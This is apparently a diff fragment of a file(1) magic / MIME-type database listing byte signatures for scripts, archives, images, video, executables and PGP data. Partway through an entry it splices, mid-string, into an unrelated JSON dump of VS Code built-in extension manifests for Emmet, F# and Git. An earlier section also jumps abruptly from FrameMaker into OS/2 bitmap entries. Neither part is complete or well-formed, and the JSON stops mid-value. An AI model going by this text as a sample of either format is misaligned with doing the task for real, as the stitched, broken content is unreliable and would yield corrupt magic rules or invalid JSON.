``eval'' line recognizes an +# outrageously clever hack for USG systems. +# Keith Waclena +0 string #!/bin/perl application/x-perl +0 string #!\ /bin/perl application/x-perl +0 string eval\ "exec\ /bin/perl application/x-perl +0 string #!/usr/bin/perl application/x-perl +0 string #!\ /usr/bin/perl application/x-perl +0 string eval\ "exec\ /usr/bin/perl application/x-perl +0 string #!/usr/local/bin/perl application/x-perl +0 string #!\ /usr/local/bin/perl application/x-perl +0 string eval\ "exec\ /usr/local/bin/perl application/x-perl + +#------------------------------------------------------------------------------ +# compress: file(1) magic for pure-compression formats (no archives) +# +# compress, gzip, pack, compact, huf, squeeze, crunch, freeze, yabba, whap, etc. +# +# Formats for various forms of compressed data +# Formats for "compress" proper have been moved into "compress.c", +# because it tries to uncompress it to figure out what's inside. + +# standard unix compress +#0 string \037\235 application/x-compress + +# gzip (GNU zip, not to be confused with [Info-ZIP/PKWARE] zip archiver) +#0 string \037\213 application/x-gzip + +0 string PK\003\004 application/x-zip + +# RAR archiver (Greg Roelofs, newt@uchicago.edu) +0 string Rar! application/x-rar + +# According to gzip.h, this is the correct byte order for packed data. +0 string \037\036 application/octet-stream +# +# This magic number is byte-order-independent. +# +0 short 017437 application/octet-stream + +# XXX - why *two* entries for "compacted data", one of which is +# byte-order independent, and one of which is byte-order dependent? +# +# compacted data +0 short 0x1fff application/octet-stream +0 string \377\037 application/octet-stream +# huf output +0 short 0145405 application/octet-stream + +# Squeeze and Crunch... +# These numbers were gleaned from the Unix versions of the programs to +# handle these formats. Note that I can only uncrunch, not crunch, and +# I didn't have a crunched file handy, so the crunch number is untested. +# Keith Waclena +#0 leshort 0x76FF squeezed data (CP/M, DOS) +#0 leshort 0x76FE crunched data (CP/M, DOS) + +# Freeze +#0 string \037\237 Frozen file 2.1 +#0 string \037\236 Frozen file 1.0 (or gzip 0.5) + +# lzh? +#0 string \037\240 LZH compressed data + +257 string ustar\0 application/x-tar posix +257 string ustar\040\040\0 application/x-tar gnu + +0 short 070707 application/x-cpio +0 short 0143561 application/x-cpio swapped + +0 string = application/x-archive +0 string \! application/x-archive +>8 string debian application/x-debian-package + +#------------------------------------------------------------------------------ +# +# RPM: file(1) magic for Red Hat Packages Erik Troan (ewt@redhat.com) +# +0 beshort 0xedab +>2 beshort 0xeedb application/x-rpm + +0 lelong&0x8080ffff 0x0000081a application/x-arc lzw +0 lelong&0x8080ffff 0x0000091a application/x-arc squashed +0 lelong&0x8080ffff 0x0000021a application/x-arc uncompressed +0 lelong&0x8080ffff 0x0000031a application/x-arc packed +0 lelong&0x8080ffff 0x0000041a application/x-arc squeezed +0 lelong&0x8080ffff 0x0000061a application/x-arc crunched + +0 leshort 0xea60 application/x-arj + +# LHARC/LHA archiver (Greg Roelofs, newt@uchicago.edu) +2 string -lh0- application/x-lharc lh0 +2 string -lh1- application/x-lharc lh1 +2 string -lz4- application/x-lharc lz4 +2 string -lz5- application/x-lharc lz5 +# [never seen any but the last; -lh4- reported in comp.compression:] +2 string -lzs- application/x-lha lzs +2 string -lh\ - application/x-lha lh +2 string -lhd- application/x-lha lhd +2 string -lh2- application/x-lha lh2 +2 string -lh3- application/x-lha lh3 +2 string -lh4- application/x-lha lh4 +2 string -lh5- application/x-lha lh5 +2 string -lh6- application/x-lha lh6 +2 string -lh7- application/x-lha lh7 +# Shell archives +10 string #\ This\ is\ a\ shell\ archive application/octet-stream x-shell + +#------------------------------------------------------------------------------ +# frame: file(1) magic for FrameMaker files +# +# This stuff came on a FrameMaker demo tape, most of which is +# copyright, but this file is "published" as witness the following: +# +0 string \ +# +0 string/cB \14 byte 12 (OS/2 1.x format) +#>14 byte 64 (OS/2 2.x format) +#>14 byte 40 (Windows 3.x format) +#0 string IC icon +#0 string PI pointer +#0 string CI color icon +#0 string CP color pointer +#0 string BA bitmap array + +# CDROM Filesystems +32769 string CD001 application/x-iso9660 + +# Newer StuffIt archives (grant@netbsd.org) +0 string StuffIt application/x-stuffit +#>162 string >0 : %s + +# BinHex is the Macintosh ASCII-encoded file format (see also "apple") +# Daniel Quinlan, quinlan@yggdrasil.com +11 string must\ be\ converted\ with\ BinHex\ 4 application/mac-binhex40 +##>41 string x \b, version %.3s + + +#------------------------------------------------------------------------------ +# lisp: file(1) magic for lisp programs +# +# various lisp types, from Daniel Quinlan (quinlan@yggdrasil.com) +0 string ;; text/plain 8bit +# Emacs 18 - this is always correct, but not very magical. +0 string \012( application/x-elc +# Emacs 19 +0 string ;ELC\023\000\000\000 application/x-elc + +#------------------------------------------------------------------------------ +# mail.news: file(1) magic for mail and news +# +# There are tests to ascmagic.c to cope with mail and news. +0 string Relay-Version: message/rfc822 7bit +0 string #!\ rnews message/rfc822 7bit +0 string N#!\ rnews message/rfc822 7bit +0 string Forward\ to message/rfc822 7bit +0 string Pipe\ to message/rfc822 7bit +0 string Return-Path: message/rfc822 7bit +0 string Received: message/rfc822 +0 string Path: message/news 8bit +0 string Xref: message/news 8bit +0 string From: message/rfc822 7bit +0 string Article message/news 8bit +#------------------------------------------------------------------------------ +# msword: file(1) magic for MS Word files +# +# Contributor claims: +# Reversed-engineered MS Word magic numbers +# + +0 string \376\067\0\043 application/msword +0 string \320\317\021\340\241\261 application/msword +0 string \333\245-\0\0\0 application/msword + + + +#------------------------------------------------------------------------------ +# printer: file(1) magic for printer-formatted files +# + +# PostScript +0 string %! application/postscript +0 string \004%! application/postscript + +# Acrobat +# (due to clamen@cs.cmu.edu) +0 string %PDF- application/pdf + +#------------------------------------------------------------------------------ +# sc: file(1) magic for "sc" spreadsheet +# +38 string Spreadsheet application/x-sc + +#------------------------------------------------------------------------------ +# tex: file(1) magic for TeX files +# +# XXX - needs byte-endian stuff (big-endian and little-endian DVI?) +# +# From + +# Although we may know the offset of certain text fields in TeX DVI +# and font files, we can't use them reliably because they are not +# zero terminated. [but we do anyway, christos] +0 string \367\002 application/x-dvi +#0 string \367\203 TeX generic font data +#0 string \367\131 TeX packed font data +#0 string \367\312 TeX virtual font data +#0 string This\ is\ TeX, TeX transcript text +#0 string This\ is\ METAFONT, METAFONT transcript text + +# There is no way to detect TeX Font Metric (*.tfm) files without +# breaking them apart and reading the data. The following patterns +# match most *.tfm files generated by METAFONT or afm2tfm. +2 string \000\021 application/x-tex-tfm +2 string \000\022 application/x-tex-tfm +#>34 string >\0 (%s) + +# Texinfo and GNU Info, from Daniel Quinlan (quinlan@yggdrasil.com) +0 string \\input\ texinfo text/x-texinfo +0 string This\ is\ Info\ file text/x-info + +# correct TeX magic for Linux (and maybe more) +# from Peter Tobias (tobias@server.et-inf.fho-emden.de) +# +0 leshort 0x02f7 application/x-dvi + +# RTF - Rich Text Format +0 string {\\rtf text/rtf + +#------------------------------------------------------------------------------ +# animation: file(1) magic for animation/movie formats +# +# animation formats, originally from vax@ccwf.cc.utexas.edu (VaX#n8) +# MPEG file +# MPEG sequences +0 belong 0x000001BA +>4 byte &0x40 video/mp2p +>4 byte ^0x40 video/mpeg +0 belong 0x000001BB video/mpeg +0 belong 0x000001B0 video/mp4v-es +0 belong 0x000001B5 video/mp4v-es +0 belong 0x000001B3 video/mpv +0 belong&0xFF5FFF1F 0x47400010 video/mp2t +0 belong 0x00000001 +>4 byte&0x1F 0x07 video/h264 + +# FLI animation format +0 leshort 0xAF11 video/fli +# FLC animation format +0 leshort 0xAF12 video/flc +# +# SGI and Apple formats +# Added ISO mimes +0 string MOVI video/sgi +4 string moov video/quicktime +4 string mdat video/quicktime +4 string wide video/quicktime +4 string skip video/quicktime +4 string free video/quicktime +4 string idsc image/x-quicktime +4 string idat image/x-quicktime +4 string pckg application/x-quicktime +4 string/B jP image/jp2 +4 string ftyp +>8 string isom video/mp4 +>8 string mp41 video/mp4 +>8 string mp42 video/mp4 +>8 string/B jp2 image/jp2 +>8 string 3gp video/3gpp +>8 string avc1 video/3gpp +>8 string mmp4 video/mp4 +>8 string/B M4A audio/mp4 +>8 string/B qt video/quicktime +# The contributor claims: +# I couldn't find a real magic number for these, however, this +# -appears- to work. Note that it might catch other files, too, +# so BE CAREFUL! +# +# Note that title and author appear in the two 20-byte chunks +# at decimal offsets 2 and 22, respectively, but they are XOR'ed with +# 255 (hex FF)! DL format SUCKS BIG ROCKS. +# +# DL file version 1 , medium format (160x100, 4 images/screen) +0 byte 1 video/unknown +0 byte 2 video/unknown +# +# Databases +# +# GDBM magic numbers +# Will be maintained as part of the GDBM distribution in the future. +# +0 belong 0x13579ace application/x-gdbm +0 lelong 0x13579ace application/x-gdbm +0 string GDBM application/x-gdbm +# +0 belong 0x061561 application/x-dbm +# +# Executables +# +0 string \177ELF +>16 leshort 0 application/octet-stream +>16 leshort 1 application/x-object +>16 leshort 2 application/x-executable +>16 leshort 3 application/x-sharedlib +>16 leshort 4 application/x-coredump +>16 beshort 0 application/octet-stream +>16 beshort 1 application/x-object +>16 beshort 2 application/x-executable +>16 beshort 3 application/x-sharedlib +>16 beshort 4 application/x-coredump +# +# DOS +0 string MZ application/x-dosexec +# +# KDE +0 string [KDE\ Desktop\ Entry] application/x-kdelnk +0 string \#\ KDE\ Config\ File application/x-kdelnk +# xmcd database file for kscd +0 string \#\ xmcd text/xmcd + +#------------------------------------------------------------------------------ +# pkgadd: file(1) magic for SysV R4 PKG Datastreams +# +0 string #\ PaCkAgE\ DaTaStReAm application/x-svr4-package + +#PNG Image Format +0 string \x89PNG image/png + +# MNG Video Format, +0 string \x8aMNG video/x-mng +0 string \x8aJNG video/x-jng + +#------------------------------------------------------------------------------ +# Hierarchical Data Format, used to facilitate scientific data exchange +# specifications at http://hdf.ncsa.uiuc.edu/ +#Hierarchical Data Format (version 4) data +0 belong 0x0e031301 application/x-hdf +#Hierarchical Data Format (version 5) data +0 string \211HDF\r\n\032 application/x-hdf + +# Adobe Photoshop +0 string 8BPS image/x-photoshop + +# Felix von Leitner +0 string d8:announce application/x-bittorrent + + +# lotus 1-2-3 document +0 belong 0x00001a00 application/x-123 +0 belong 0x00000200 application/x-123 + +# MS Access database +4 string Standard\ Jet\ DB application/msaccess + +## magic for XBase files +#0 byte 0x02 +#>8 leshort >0 +#>>12 leshort 0 application/x-dbf +# +#0 byte 0x03 +#>8 leshort >0 +#>>12 leshort 0 application/x-dbf +# +#0 byte 0x04 +#>8 leshort >0 +#>>12 leshort 0 application/x-dbf +# +#0 byte 0x05 +#>8 leshort >0 +#>>12 leshort 0 application/x-dbf +# +#0 byte 0x30 +#>8 leshort >0 +#>>12 leshort 0 application/x-dbf +# +#0 byte 0x43 +#>8 leshort >0 +#>>12 leshort 0 application/x-dbf +# +#0 byte 0x7b +#>8 leshort >0 +#>>12 leshort 0 application/x-dbf +# +#0 byte 0x83 +#>8 leshort >0 +#>>12 leshort 0 application/x-dbf +# +#0 byte 0x8b +#>8 leshort >0 +#>>12 leshort 0 application/x-dbf +# +#0 byte 0x8e +#>8 leshort >0 +#>>12 leshort 0 application/x-dbf +# +#0 byte 0xb3 +#>8 leshort >0 +#>>12 leshort 0 application/x-dbf +# +#0 byte 0xf5 +#>8 leshort >0 +#>>12 leshort 0 application/x-dbf +# +#0 leshort 0x0006 application/x-dbt + +# Debian has entries for the old PGP formats: +# pgp: file(1) magic for Pretty Good Privacy +# see http://lists.gnupg.org/pipermail/gnupg-devel/1999-September/016052.html +#text/PGP key public ring +0 beshort 0x9900 application/pgp +#text/PGP key security ring +0 beshort 0x9501 application/pgp +#text/PGP key security ring +0 beshort 0x9500 application/pgp +#text/PGP encrypted data +0 beshort 0xa600 application/pgp-encrypted +#text/PGP armored data +##public key block +2 string ---BEGIN\ PGP\ PUBLIC\ KEY\ BLOCK- application/pgp-keys +0 string -----BEGIN\040PGP\40MESSAGE- application/pgp +0 string -----BEGIN\040PGP\40SIGNATURE- application/pgp-signature +# +# GnuPG Magic: +# +# +#text/GnuPG key public ring +0 beshort 0x9901 application/pgp +#text/OpenPGP data +0 beshort 0x8501 application/pgp-encrypted + +# flash: file(1) magic for Macromedia Flash file format +# +# See +# +# http://www.macromedia.com/software/flash/open/ +# +0 string FWS +>3 byte x application/x-shockwave-flash + +# The following paramaters are created for Namazu. +# +# +# 1999/08/13 +#0 string \","description":"A definition of comment that should be placed after matched element when comment filter is applied."},"filter.commentTrigger":{"type":"array","default":["id","class"],"description":"A comma-separated list of attribute names that should exist in abbreviation for the comment filter to be applied"},"format.noIndentTags":{"type":"array","default":["html"],"description":"An array of tag names that should not get inner indentation"},"format.forceIndentationForTags":{"type":"array","default":["body"],"description":"An array of tag names that should always get inner indentation"},"profile.allowCompactBoolean":{"type":"boolean","default":false,"description":"If true, compact notation of boolean attributes are produced"}}},"emmet.showSuggestionsAsSnippets":{"type":"boolean","default":false,"description":"If true, then Emmet suggestions will show up as snippets allowing you to order them as per editor.snippetSuggestions setting."}}},"commands":[{"command":"editor.emmet.action.wrapIndividualLinesWithAbbreviation","title":"Wrap Individual Lines with Abbreviation","category":"Emmet"},{"command":"editor.emmet.action.wrapWithAbbreviation","title":"Wrap with Abbreviation","category":"Emmet"},{"command":"editor.emmet.action.removeTag","title":"Remove Tag","category":"Emmet"},{"command":"editor.emmet.action.updateTag","title":"Update Tag","category":"Emmet"},{"command":"editor.emmet.action.matchTag","title":"Go to Matching Pair","category":"Emmet"},{"command":"editor.emmet.action.balanceIn","title":"Balance (inward)","category":"Emmet"},{"command":"editor.emmet.action.balanceOut","title":"Balance (outward)","category":"Emmet"},{"command":"editor.emmet.action.prevEditPoint","title":"Go to Previous Edit Point","category":"Emmet"},{"command":"editor.emmet.action.nextEditPoint","title":"Go to Next Edit Point","category":"Emmet"},{"command":"editor.emmet.action.mergeLines","title":"Merge Lines","category":"Emmet"},{"command":"editor.emmet.action.selectPrevItem","title":"Select Previous Item","category":"Emmet"},{"command":"editor.emmet.action.selectNextItem","title":"Select Next Item","category":"Emmet"},{"command":"editor.emmet.action.splitJoinTag","title":"Split/Join Tag","category":"Emmet"},{"command":"editor.emmet.action.toggleComment","title":"Toggle Comment","category":"Emmet"},{"command":"editor.emmet.action.evaluateMathExpression","title":"Evaluate Math Expression","category":"Emmet"},{"command":"editor.emmet.action.updateImageSize","title":"Update Image Size","category":"Emmet"},{"command":"editor.emmet.action.incrementNumberByOneTenth","title":"Increment by 0.1","category":"Emmet"},{"command":"editor.emmet.action.incrementNumberByOne","title":"Increment by 1","category":"Emmet"},{"command":"editor.emmet.action.incrementNumberByTen","title":"Increment by 10","category":"Emmet"},{"command":"editor.emmet.action.decrementNumberByOneTenth","title":"Decrement by 0.1","category":"Emmet"},{"command":"editor.emmet.action.decrementNumberByOne","title":"Decrement by 1","category":"Emmet"},{"command":"editor.emmet.action.decrementNumberByTen","title":"Decrement by 10","category":"Emmet"},{"command":"editor.emmet.action.reflectCSSValue","title":"Reflect CSS Value","category":"Emmet"}]},"scripts":{"compile":"gulp compile-extension:emmet"},"devDependencies":{"@types/node":"7.0.43","vscode":"1.0.1"},"dependencies":{"@emmetio/html-matcher":"^0.3.1","@emmetio/css-parser":"ramya-rao-a/css-parser#vscode","@emmetio/math-expression":"^0.1.1","vscode-emmet-helper":"^1.1.19","vscode-languageserver-types":"^3.0.3","image-size":"^0.5.2","vscode-nls":"2.0.2"},"isBuiltin":true,"id":"vscode.emmet","extensionFolderPath":"/usr/share/code/resources/app/extensions/emmet"},{"name":"extension-editing","version":"0.0.1","publisher":"vscode","engines":{"vscode":"^1.4.0"},"categories":["Languages","Other"],"activationEvents":["onLanguage:json","onLanguage:markdown","onLanguage:typescript"],"main":"/usr/share/code/resources/app/extensions/extension-editing/out/extension","scripts":{"compile":"gulp compile-extension:extension-editing","watch":"gulp watch-extension:extension-editing"},"dependencies":{"jsonc-parser":"^0.3.1","markdown-it":"^8.3.1","parse5":"^3.0.2","vscode-nls":"^2.0.1"},"contributes":{"jsonValidation":[{"fileMatch":"package.json","url":"vscode://schemas/vscode-extensions"},{"fileMatch":"*language-configuration.json","url":"vscode://schemas/language-configuration"},{"fileMatch":"*icon-theme.json","url":"vscode://schemas/icon-theme"},{"fileMatch":"*color-theme.json","url":"vscode://schemas/color-theme"}]},"devDependencies":{"@types/markdown-it":"0.0.2","@types/node":"6.0.78"},"isBuiltin":true,"id":"vscode.extension-editing","extensionFolderPath":"/usr/share/code/resources/app/extensions/extension-editing"},{"name":"fsharp","version":"0.1.0","publisher":"vscode","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../../build/npm/update-grammar.js ionide/ionide-fsgrammar grammar/fsharp.json ./syntaxes/fsharp.json"},"contributes":{"languages":[{"id":"fsharp","extensions":[".fs",".fsi",".fsx",".fsscript"],"aliases":["F#","FSharp","fsharp"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"fsharp","scopeName":"source.fsharp","path":"./syntaxes/fsharp.json"}],"snippets":[{"language":"fsharp","path":"./snippets/fsharp.json"}]},"isBuiltin":true,"id":"vscode.fsharp","extensionFolderPath":"/usr/share/code/resources/app/extensions/fsharp"},{"name":"git","publisher":"vscode","displayName":"git","description":"Git","version":"0.0.1","engines":{"vscode":"^1.5.0"},"aiKey":"AIF-d9b70cd4-b9f9-4d70-929b-a071c400b217","enableProposedApi":true,"categories":["Other"],"activationEvents":["*"],"main":"/usr/share/code/resources/app/extensions/git/out/main","scripts":{"compile":"gulp compile-extension:git","watch":"gulp watch-extension:git"},"contributes":{"commands":[{"command":"git.clone","title":"Clone","category":"Git"},{"command":"git.init","title":"Initialize Repository","category":"Git","icon":{"light":"resources/icons/light/git.svg","dark":"resources/icons/dark/git.svg"}},{"command":"git.close","title":"Close Repository","category":"Git"},{"command":"git.refresh","title":"Refresh","category":"Git","icon":{"light":"resources/icons/light/refresh.svg","dark":"resources/icons/dark/refresh.svg"}},{"command":"git.openChange","title":"Open Changes","category":"Git","icon":{"light":"resources/icons/light/open-change.svg","dark":"resources/icons/dark/open-change.svg"}},{"command":"git.openFile","title":"Open File","category":"Git","icon":{"light":"resources/icons/light/open-file.svg","dark":"resources/icons/dark/open-file.svg"}},{"command":"git.openHEADFile","title":"Open File (HEAD)","category":"Git"},{"command":"git.stage","title":"Stage Changes","category":"Git","icon":{"light":"resources/icons/light/stage.svg","dark":"resources/icons/dark/stage.svg"}},{"command":"git.stageAll","title":"Stage All Changes","category":"Git","icon":{"light":"resources/icons/light/stage.svg","dark":"resources/icons/dark/stage.svg"}},{"command":"git.stageSelectedRanges","title":"Stage Selected Ranges","category":"Git"},{"command":"git.revertSelectedRanges","title":"Revert Selected Ranges","category":"Git"},{"command":"git.stageChange","title":"Stage Change","category":"Git","icon":{"light":"resources/icons/light/stage.svg","dark":"resources/icons/dark/stage.svg"}},{"command":"git.revertChange","title":"Revert Change","category":"Git","icon":{"light":"resources/icons/light/clean.svg","dark":"resources/icons/dark/clean.svg"}},{"command":"git.unstage","title":"Unstage Changes","category":"Git","icon":{"light":"resources/icons/light/unstage.svg","dark":"resources/icons/dark/unstage.svg"}},{"command":"git.unstageAll","title":"Unstage All Changes","category":"Git","icon":{"light":"resources/icons/light/unstage.svg","dark":"resources/icons/dark/unstage.svg"}},{"command":"git.unstageSelectedRanges","title":"Unstage Selected Ranges","category":"Git"},{"command":"git.clean","title":"Discard Changes","category":"Git","icon":{"light":"resources/icons/light/clean.svg","dark":"resources/icons/dark/clean.svg"}},{"command":"git.cleanAll","title":"Discard All Changes","category":"Git","icon":{"light":"resources/icons/light/clean.svg","dark":"resources/icons/dark/clean.svg"}},{"command":"git.commit","title":"Commit","category":"Git","icon":{"light":"resources/icons/light/check.svg","dark":"resources/icons/dark/check.svg"}},{"command":"git.commitStaged","title":"Commit Staged","category":"Git"},{"command":"git.commitStagedSigned","title":"Commit Staged (Signed Off)","category":"Git"},{"command":"git.commitStagedAmend","title":"Commit Staged (Amend)","category":"Git"},{"command":"git.commitAll","title":"Commit All","category":"Git"},{"command":"git.commitAllSigned","title":"Commit All (Signed Off)","category":"Git"},{"command":"git.commitAllAmend","title":"Commit All (Amend)","category":"Git"},{"command":"git.undoCommit","title":"Undo Last Commit","category":"Git"},{"command":"git.checkout","title":"Checkout to...","category":"Git"},{"command":"git.branch","title":"Create Branch...","category":"Git"},{"command":"git.deleteBranch","title":"Delete Branch...","category":"Git"},{"command":"git.renameBranch","title":"Rename Branch...","category":"Git"},{"command":"git.merge","title":"Merge Branch...","category":"Git"},{"command":"git.createTag","title":"Create Tag","category":"Git"},{"command":"git.fetch","title":"Fetch","category":"Git"},{"command":"git.pull","title":"Pull","category":"Git"},{"command":"git.pullRebase","title":"Pull (Rebase)","category":"Git"},{"command":"git.pullFrom","title":"Pull from...","category":"Git"},{"command":"git.push","title":"Push","category":"Git"},{"command":"git.pushTo","title":"Push to...","category":"Git"},{"command":"git.pushWithTags","title":"Push With Tags","category":"Git"},{"command":"git.sync","title":"Sync","category":"Git"},{"command":"git.syncRebase","title":"Sync (Rebase)","category":"Git"},{"command":"git.publish","title":"Publish Branch","category":"Git"},{"command":"git.showOutput","title":"Show Git Output","category":"Git"},{"command":"git.ignore","title":"Add File to .gitignore","category":"Git"},{"command":"git.stashIncludeUntracked","title":"Stash (Include Untracked)","category":"Git"},{"command":"git.stash","title":"Stash","category":"Git"},{"command":"git.stashPop","title":"Pop Stash...","category":"Git"},{"command":"git.stashPopLatest","title":"Pop Latest Stash","category":"Git"}],"menus":{"commandPalette":[{"command":"git.clone","when":"config.git.enabled"},{"command":"git.init","when":"config.git.enabled"},{"command":"git.close","when":"gitOpenRepositoryCount != 0"},{"command":"git.refresh","when":"gitOpenRepositoryCount != 0"},{"command":"git.openFile","when":"gitOpenRepositoryCount != 0"},{"command":"git.openHEADFile","when":"gitOpenRepositoryCount != 0"},{"command":"git.openChange","when":"gitOpenRepositoryCount != 0"},{"command":"git.stage","when":"gitOpenRepositoryCount != 0"},{"command":"git.stageAll","when":"gitOpenRepositoryCount != 0"},{"command":"git.stageSelectedRanges","when":"gitOpenRepositoryCount != 0"},{"command":"git.stageChange","when":"false"},{"command":"git.revertSelectedRanges","when":"gitOpenRepositoryCount != 0"},{"command":"git.revertChange","when":"false"},{"command":"git.unstage","when":"gitOpenRepositoryCount != 0"},{"command":"git.unstageAll","when":"gitOpenRepositoryCount != 0"},{"command":"git.unstageSelectedRanges","when":"gitOpenRepositoryCount != 0"},{"command":"git.clean","when":"gitOpenRepositoryCount != 0"},{"command":"git.cleanAll","when":"gitOpenRepositoryCount != 0"},{"command":"git.commit","when":"gitOpenRepositoryCount != 0"},{"command":"git.commitStaged","when":"gitOpenRepositoryCount != 0"},{"command":"git.commitStagedSigned","when":"gitOpenRepositoryCount != 0"},{"command":"git.commitStagedAmend","when":"gitOpenRepositoryCount != 0"},{"command":"git.commitAll","when":"gitOpenRepositoryCount != 0"},{"command":"git.commitAllSigned","when":"gitOpenRepositoryCount != 0"},{"command":"git.commitAllAmend","when":"gitOpenRepositoryCount != 0"},{"command":"git.undoCommit","when":"gitOpenRepositoryCount != 0"},{"command":"git.checkout","when":"gitOpenRepositoryCount != 0"},{"command":"git.branch","when":"gitOpenRepositoryCount != 0"},{"command":"git.deleteBranch","when":"gitOpenRepositoryCount != 0"},{"command":"git.renameBranch","when":"gitOpenRepositoryCount != 0"},{"command":"git.pull","when":"gitOpenRepositoryCount != 0"},{"command":"git.pullFrom","when":"gitOpenRepositoryCount != 0"},{"command":"git.pullRebase","when":"gitOpenRepositoryCount != 0"},{"command":"git.pullFrom","when":"gitOpenRepositoryCount != 0"},{"command":"git.merge","when":"gitOpenRepositoryCount != 0"},{"command":"git.createTag","when":"gitOpenRepositoryCount != 0"},{"command":"git.fetch","when":"gitOpenRepositoryCount != 0"},{"command":"git.push","when":"gitOpenRepositoryCount != 0"},{"command":"git.pushTo","when":"gitOpenRepositoryCount != 0"},{"command":"git.pushWithTags","when":"gitOpenRepositoryCount != 0"},{"command":"git.sync","when":"gitOpenRepositoryCount != 0"},{"command":"git.syncRebase","when":"gitOpenRepositoryCount != 0"},{"command":"git.publish","when":"gitOpenRepositoryCount != 0"},{"command":"git.showOutput","when":"gitOpenRepositoryCount != 0"},{"command":"git.ignore","when":"gitOpenRepositoryCount != 0"},{"command":"git.stashIncludeUntracked","when":"gitOpenRepositoryCount != 0"},{"command":"git.stash","when":"gitOpenRepositoryCount != 0"},{"command":"git.stashPop","when":"gitOpenRepositoryCount != 0"},{"command":"git.stashPopLatest","when":"gitOpenRepositoryCount != 0"}],"scm/title":[{"command":"git.init","group":"navigation","when":"config.git.enabled && !scmProvider && gitOpenRepositoryCount == 0 && workspaceFolderCount != 0"},{"command":"git.commit","group":"navigation","when":"scmProvider == git"},{"command":"git.refresh","group":"navigation","when":"scmProvider == git"},{"command":"git.sync","group":"1_sync","when":"scmProvider == git"},{"command":"git.syncRebase","group":"1_sync","when":"scmProvider == git && gitState == idle"},{"command":"git.pull","group":"1_sync","when":"scmProvider == git"},{"command":"git.pullRebase","group":"1_sync","when":"scmProvider == git"},{"command":"git.pullFrom","group":"1_sync","when":"scmProvider == git"},{"command":"git.push","group":"1_sync","when":"scmProvider == git"},{"command":"git.pushTo","group":"1_sync","when":"scmProvider == git"},{"command":"git.publish","group":"2_publish","when":"scmProvider == git"},{"command":"git.commitStaged","group":"3_commit","when":"scmProvider == git"},{"command":"git.commitStagedSigned","group":"3_commit","when":"scmProvider == git"},{"command":"git.commitStagedAmend","group":"3_commit","when":"scmProvider == git"},{"command":"git.commitAll","group":"3_commit","when":"scmProvider == git"},{"command":"git.commitAllSigned","group":"3_commit","when":"scmProvider == git"},{"command":"git.commitAllAmend","group":"3_commit","when":"scmProvider == git"},{"command":"git.undoCommit","group":"3_commit","when":"scmProvider == git"},{"command":"git.stageAll","group":"4_stage","when":"scmProvider == git"},{"command":"git.unstageAll","group":"4_stage","when":"scmProvider == git"},{"command":"git.cleanAll","group":"4_stage","when":"scmProvider == git"},{"command":"git.stashIncludeUntracked","group":"5_stash","when":"scmProvider == git"},{"command":"git.stash","group":"5_stash","when":"scmProvider == git"},{"command":"git.stashPop","group":"5_stash","when":"scmProvider == git"},{"command":"git.stashPopLatest","group":"5_stash","when":"scmProvider == git"},{"command":"git.showOutput","group":"7_repository","when":"scmProvider == git"}],"scm/sourceControl":[{"command":"git.close","group":"navigation","when":"scmProvider == git"}],"scm/resourceGroup/context":[{"command":"git.stageAll","when":"scmProvider == git && scmResourceGroup == merge","group":"1_modification"},{"command":"git.stageAll","when":"scmProvider == git && scmResourceGroup == merge","group":"inline"},{"command":"git.unstageAll","when":"scmProvider == git && scmResourceGroup == index","group":"1_modification"},{"command":"git.unstageAll","when":"scmProvider == git && scmResourceGroup == index","group":"inline"},{"command":"git.cleanAll","when":"scmProvider == git && scmResourceGroup == workingTree","group":"1_modification"},{"command":"git.stageAll","when":"scmProvider == git && scmResourceGroup == workingTree","group":"1_modification"},{"command":"git.cleanAll","when":"scmProvider == git && scmResourceGroup == workingTree","group":"inline"},{"command":"git.stageAll","when":"scmProvider == git && scmResourceGroup == workingTree","group":"inline"}],"scm/resourceState/context":[{"command":"git.stage","when":"scmProvider == git && scmResourceGroup == merge","group":"1_modification"},{"command":"git.stage","when":"scmProvider == git && scmResourceGroup == merge","group":"inline"},{"command":"git.openChange","when":"scmProvider == git && scmResourceGroup == index","group":"navigation"},{"command":"git.openFile","when":"scmProvider == git && scmResourceGroup == index","group":"navigation"},{"command":"git.openHEADFile","when":"scmProvider == git && scmResourceGroup == index","group":"navigation"},{"command":"git.unstage","when":"scmProvider == git && scmResourceGroup == index","group":"1_modification"},{"command":"git.unstage","when":"scmProvider == git && scmResourceGroup == index","group":"inline"},{"command":"git.openChange","when":"scmProvider == git && scmResourceGroup == workingTree","group":"navigation"},{"command":"git.openHEADFile","when":"scmProvider == git && scmResourceGroup == workingTree","group":"navigation"},{"command":"git.openFile","when":"scmProvider == git && scmResourceGroup == workingTree","group":"navigation"},{"command":"git.stage","when":"scmProvider == git && scmResourceGroup == workingTree","group":"1_modification"},{"command":"git.clean","when":"scmProvider == git && scmResourceGroup == workingTree","group":"1_modification"},{"command":"git.clean","when":"scmProvider == git && scmResourceGroup == workingTree","group":"inline"},{"command":"git.stage","when":"scmProvider == git && scmResourceGroup == workingTree","group":"inline"},{"command":"git.ignore","when":"scmProvider == git && scmResourceGroup == workingTree","group":"1_modification@3"}],"editor/title":[{"command":"git.openFile","group":"navigation","when":"gitOpenRepositoryCount != 0 && isInDiffEditor && resourceScheme != extension && resourceScheme != merge-conflict.conflict-diff"},{"command":"git.openChange","group":"navigation","when":"gitOpenRepositoryCount != 0 && !isInDiffEditor && resourceScheme == file"},{"command":"git.stageSelectedRanges","group":"2_git@1","when":"gitOpenRepositoryCount != 0 && isInDiffEditor && resourceScheme != merge-conflict.conflict-diff"},{"command":"git.unstageSelectedRanges","group":"2_git@2","when":"gitOpenRepositoryCount != 0 && isInDiffEditor && resourceScheme != merge-conflict.conflict-diff"},{"command":"git.revertSelectedRanges","group":"2_git@3","when":"gitOpenRepositoryCount != 0 && isInDiffEditor && resourceScheme != merge-conflict.conflict-diff"}],"scm/change/title":[{"command":"git.stageChange","when":"originalResourceScheme == git"},{"command":"git.revertChange","when":"originalResourceScheme == git"}]},"configuration":{"title":"Git","properties":{"git.enabled":{"type":"boolean","scope":"resource","description":"Whether git is enabled","default":true},"git.path":{"type":["string","null"],"description":"Path to the git executable","default":null,"isExecutable":true},"git.autorefresh":{"type":"boolean","description":"Whether auto refreshing is enabled","default":true},"git.autofetch":{"type":"boolean","description":"Whether auto fetching is enabled","default":false},"git.confirmSync":{"type":"boolean","description":"Confirm before synchronizing git repositories","default":true},"git.countBadge":{"type":"string","enum":["all","tracked","off"],"description":"Controls the git badge counter. `all` counts all changes. `tracked` counts only the tracked changes. `off` turns it 